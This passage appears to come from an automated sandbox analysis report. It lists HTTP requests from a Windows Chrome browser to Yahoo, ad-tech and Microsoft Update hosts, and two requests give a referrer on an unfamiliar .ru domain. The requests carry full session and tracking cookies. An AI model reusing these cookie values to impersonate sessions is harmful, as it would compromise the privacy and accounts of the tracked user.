A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pips.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/cds-pips.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /demconf.jpg?et:ibs%7cdata:dpid=30646 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=86882777560484617681301632197120982451; dpm=86882777560484617681301632197120982451
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-geolocation-1.3.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cms?partner_id=NEUAR&_origin=false&_redirect=false&_hosted_id=219623205021003425087&gdpr=&gdpr_consent= HTTP/1.1Host: cms.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC="19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt"
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=60ff7c91-851e-44a7-8400-9dddc9a53744,6af55d48-c74c-4256-b3c7-d83c2f09aacb,5805266d-0392-4fc5-99e3-b3b7e9dcb8e1,d1fcf1c7-2c6e-42c3-872e-a19bb4e9cd08,18f2d39f-eda5-4e7b-ae1d-b679c4a66f1a,96cf70ac-87fb-47ef-be1c-255bf47b00c2&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET /oath/1/info2?sType=sync&_sdv&sExtCookieId=y-utA7x.JE2oM7UhEgkHtPGjDCEovUviSB184-~A&sInitiator=external HTTP/1.1Host: uipus.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: SEUNCY=8B22F39EC31AE5F8
Source: global trafficHTTP traffic detected: GET /?uid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380&ptf=V2luZG93cw==&ptfv=MTAuMC4w&ufv=MTE3LjAuNTkzOC4xMzI=&bnd=R29vZ2xlIENocm9tZQ==&bndv=MTE3&bnd=Tm90O0E9QnJhbmQ=&bndv=OA==&bnd=Q2hyb21pdW0=&bndv=MTE3&mbl=ZmFsc2U= HTTP/1.1Host: cds.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58692/cms?partner_id=NEUAR&_origin=false&_redirect=false&_hosted_id=219623205021003425087&gdpr=&gdpr_consent= HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC="19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt"
Source: global trafficHTTP traffic detected: GET /tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=eARa8MVzIY4 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380
Source: global trafficHTTP traffic detected: GET /eh/prebid-config/bp-fp.json HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /idex/did-004f/any?duid=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq&us_privacy=1YNN&gdpr=0&did=did-004f&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com&pu=https%3A%2F%2Fwww.yahoo.com&resolve=nonId&resolve=magnite&resolve=pubmatic&resolve=index&resolve=openx HTTP/1.1Host: idx.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LrkSUHRE2Sx57my&MD=btZSeAEe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1200%2Cx_0%2Cy_11/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/9cc49da8e6bbb68a4a886a5bc8ac7872.png HTTP/1.1Host: images.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_179%2Cw_340%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A//cdn.taboola.com/libtrc/static/thumbnails/0ecf13bd0c5698f9380cda21a35784a0.jpg HTTP/1.1Host: images.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pips.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /oath/1/info2?sType=sync&_sdv&sExtCookieId=y-utA7x.JE2oM7UhEgkHtPGjDCEovUviSB184-~A&sInitiator=external HTTP/1.1Host: uipus.semasio.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: SEUNCY=8B22F39EC31AE5F8
Source: global trafficHTTP traffic detected: GET /aaq/f10d509c/d1ccw66oyq8ex2.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=60ff7c91-851e-44a7-8400-9dddc9a53744,6af55d48-c74c-4256-b3c7-d83c2f09aacb,5805266d-0392-4fc5-99e3-b3b7e9dcb8e1,d1fcf1c7-2c6e-42c3-872e-a19bb4e9cd08,18f2d39f-eda5-4e7b-ae1d-b679c4a66f1a,96cf70ac-87fb-47ef-be1c-255bf47b00c2&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; _li_dcdm_c=.yahoo.com; _lc2_fpi=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq; _lc2_fpi_meta=%7B%22w%22%3A1727716871988%7D
Source: global trafficHTTP traffic detected: GET /du/ay/wnsrvbjmeprtfrnfx.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-geolocation-1.3.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=eARa8MVzIY4 HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; _li_dcdm_c=.yahoo.com; _lc2_fpi=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq; _lc2_fpi_meta=%7B%22w%22%3A1727716871988%7D
Source: global trafficHTTP traffic detected: GET /1a HTTP/1.1Host: i.clean.ggConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/prebid/prebid-2.0.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1727716872500&did=did-004f&se=e30&duid=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&refr=https%3A%2F%2Fhfj.rontishet.ru%2F&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1727716872500&did=did-004f&se=e30&duid=05c3ae107b3d--01j91z6kskcb9e9axvbr8ebtqq&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&us_privacy=1YNN&wpn=prebid&gdpr=0&refr=https%3A%2F%2Fhfj.rontishet.ru%2F&gpp_s=DBAA&gpp_as=-1&cd=.yahoo.com&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lidid=8ee0c49b-140c-40eb-9a80-81eb1f667bc5
